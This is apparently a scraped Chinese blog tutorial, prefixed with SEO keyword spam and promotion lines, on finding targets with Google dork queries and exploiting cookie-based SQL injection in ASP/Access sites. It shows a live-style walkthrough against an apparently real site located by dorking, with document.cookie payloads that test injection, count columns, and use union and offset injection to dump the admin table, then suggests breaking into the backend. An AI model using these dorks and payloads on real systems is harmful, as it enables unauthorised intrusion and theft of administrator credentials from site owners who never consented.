网站建设课本,成都做一个中小企业网站需要多少钱,你理解的网络营销是什么,网站整体克隆包含后台目录 谷歌语法-信息收集
cookie注入
实战演示
信息收集
SQL注入判断
查找字段数
爆破表名
输出结果
总结 hack渗透视频教程#xff0c;扫码免费领 谷歌语法-信息收集
1.查找带有ID传参的网站#xff08;可以查找sql注入漏洞#xff09; inurl:asp idxx 2.查找网站后…
目录 谷歌语法-信息收集
cookie注入
实战演示
信息收集
SQL注入判断
查找字段数
爆破表名
输出结果
总结 hack渗透视频教程扫码免费领 谷歌语法-信息收集
1.查找带有ID传参的网站可以查找sql注入漏洞 inurl:asp idxx 2.查找网站后台多数有登陆框可以查找弱口令暴力破解等漏洞 site:http://xxxx.com “admin” site:http://xx.com intext:管理 site:http://xx.com inurl:login site:http://xx.com intitle:后台 3.查看上传漏洞 site:http://xx.com inurl:file site:http://xx.com inurl:load 4.查找敏感文件 filetype:mdb|doc|xlsx|pdf
cookie注入
1、cookie注入 cookie相当于访问者的身份证,后端php代码中的$_REQUEST[]来获取你的cookie,网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库,传入了数据库这样我们就有机可乘了我们可以修改cookie值进入数据库中进行sql注入 Cookie注入在ASP网站中和低版本php中才会有ASP常用的数据库是Accsess。
2、Access数据库 access有强大的数据处理、统计分析能力利用access的查询功能可以方便地进行各类汇总、平均等统计并且access数据库无库名。 access数据库在查询语句时和mysql不同access比较严谨 所以要select 字段 from 表名 函数exists(select*from 表名)可以验证这个表名是否存在这个表名还可以用burp来爆破
3、怎样修改cookie: 用burp抓包改 用插件改需要自己编码一下 阅览器自带js进行设置document.cookie’id’escape(“代码”)
实战演示
信息收集
通过谷歌语法查找带有asp文件下的id传参发现有很多带有id1传参的网站可以挨个试一试id传参数可以任意修改。 发现一家id104的网站 SQL注入判断
废话不多说直接判断是否存在sql注入,and 12发现网站报错但是11页面显示正常说明存在sql注入 document.cookieidescape(104 and 11)document.cookieidescape(104 and 12) 查找字段数
直接查找一下字段数发现字段数为10 document.cookieidescape(104 order by 10) 爆破表名
因为这是一个ACCESS数据库没有库名所以我们可以使用burp爆破出表名,这里就不给大家展示了。 document.cookieidescape(104 union select 1,2,3,4,5,6,7,8,9,10 from admin) 发现存在admin表且回显点是2和5 输出结果
使用偏移注入查看admin表的字段数并且把表里的内容显示出来 document.cookieidescape(104 union select 1,2,3,4,5,6,7,admin.* from admin)document.cookieidescape(104 union select 1,2,3,admin.*,7,8,9,10 from admin) 总结
1.谷歌语法找到注入点 2.判断注入是否存在 3.通过cookie绕过注入 4.爆破表名 5.偏移注入查找表的字段数 6.最后可以通过爆破目录查找登陆框进入后台进一步渗透拿权限这次实战记录很适合新手小白挖SRC希望多多支持~ hack渗透视频教程扫码免费领